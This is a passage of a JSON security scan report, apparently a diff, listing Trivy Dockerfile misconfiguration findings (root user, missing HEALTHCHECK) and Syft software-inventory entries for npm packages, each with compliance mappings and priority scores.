"builtin.dockerfile.DS002", + "Query": "data.builtin.dockerfile.DS002.deny", + "Resolution": "Add 'USER ' line to the Dockerfile", + "Severity": "HIGH", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", + "References": [ + "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", + "https://avd.aquasec.com/misconfig/ds-0002" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7b29c0ae384e49f6", + "ruleId": "No HEALTHCHECK defined", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "Dockerfile.production", + "startLine": 0 + }, + "message": "No HEALTHCHECK defined", + "title": "No HEALTHCHECK defined", + "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "remediation": "https://avd.aquasec.com/misconfig/ds-0026", + "references": [], + "tags": [ + "misconfig" + ], + "raw": { + "Type": "Dockerfile Security Check", + "ID": "DS-0026", + "Title": "No HEALTHCHECK defined", + "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "Message": "Add HEALTHCHECK instruction in your Dockerfile", + "Namespace": "builtin.dockerfile.DS026", + "Query": "data.builtin.dockerfile.DS026.deny", + "Resolution": "Add HEALTHCHECK instruction in Dockerfile", + "Severity": "LOW", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", + "References": [ + "https://blog.aquasec.com/docker-security-best-practices", + "https://avd.aquasec.com/misconfig/ds-0026" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.666666666666666, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c5cf815654ece26c", + "ruleId": "Image user should not be 'root'", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "Dockerfile.test", + "startLine": 0 + }, + "message": "Image user should not be 'root'", + "title": "Image user should not be 'root'", + "description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "remediation": "https://avd.aquasec.com/misconfig/ds-0002", + "references": [], + "tags": [ + "misconfig" + ], + "raw": { + "Type": "Dockerfile Security Check", + "ID": "DS-0002", + "Title": "Image user should not be 'root'", + "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", + "Namespace": "builtin.dockerfile.DS002", + "Query": "data.builtin.dockerfile.DS002.deny", + "Resolution": "Add 'USER ' line to the Dockerfile", + "Severity": "HIGH", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", + "References": [ + "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", + "https://avd.aquasec.com/misconfig/ds-0002" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "09a592ef82d0362e", + "ruleId": "No HEALTHCHECK defined", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "Dockerfile.test", + "startLine": 0 + }, + "message": "No HEALTHCHECK defined", + "title": "No HEALTHCHECK defined", + "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "remediation": "https://avd.aquasec.com/misconfig/ds-0026", + "references": [], + "tags": [ + "misconfig" + ], + "raw": { + "Type": "Dockerfile Security Check", + "ID": "DS-0026", + "Title": "No HEALTHCHECK defined", + "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "Message": "Add HEALTHCHECK instruction in your Dockerfile", + "Namespace": "builtin.dockerfile.DS026", + "Query": "data.builtin.dockerfile.DS026.deny", + "Resolution": "Add HEALTHCHECK instruction in Dockerfile", + "Severity": "LOW", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", + "References": [ + "https://blog.aquasec.com/docker-security-best-practices", + "https://avd.aquasec.com/misconfig/ds-0026" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.666666666666666, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "18edd79c677235d0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @alloc/quick-lru 5.2.0", + "title": "@alloc/quick-lru 5.2.0", + "description": "Package discovered: @alloc/quick-lru 5.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "47af215a45bf2740", + "name": "@alloc/quick-lru", + "version": "5.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@alloc\\/quick-lru:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@alloc\\/quick-lru:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@alloc\\/quick_lru:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@alloc\\/quick_lru:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@alloc\\/quick:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@alloc\\/quick:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40alloc/quick-lru@5.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz", + "integrity": "sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "44b56e7441c56f19", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @babel/runtime 7.29.2", + "title": "@babel/runtime 7.29.2", + "description": "Package discovered: @babel/runtime 7.29.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "77d76c145d8ae8f1", + "name": "@babel/runtime", + "version": "7.29.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@babel\\/runtime:\\@babel\\/runtime:7.29.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40babel/runtime@7.29.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz", + "integrity": "sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "87ac29aa779666c3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @emnapi/runtime 1.10.0", + "title": "@emnapi/runtime 1.10.0", + "description": "Package discovered: @emnapi/runtime 1.10.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "90f3b7ad1f28a06b", + "name": "@emnapi/runtime", + "version": "1.10.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@emnapi\\/runtime:\\@emnapi\\/runtime:1.10.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40emnapi/runtime@1.10.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz", + "integrity": "sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==", + "dependencies": { + "tslib": "^2.4.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9dddf13ce7ce2b19", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @fastify/busboy 3.2.0", + "title": "@fastify/busboy 3.2.0", + "description": "Package discovered: @fastify/busboy 3.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c1858ce75e8e8799", + "name": "@fastify/busboy", + "version": "3.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@fastify\\/busboy:\\@fastify\\/busboy:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40fastify/busboy@3.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz", + "integrity": "sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "81749876eac20ae8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/app-check-interop-types 0.3.2", + "title": "@firebase/app-check-interop-types 0.3.2", + "description": "Package discovered: @firebase/app-check-interop-types 0.3.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "71780c9abc78bb02", + "name": "@firebase/app-check-interop-types", + "version": "0.3.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop-types:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop-types:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop_types:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop_types:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-check:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-check:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_check:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_check:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/app-check-interop-types@0.3.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz", + "integrity": "sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "efa61bee7bbbbcb1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 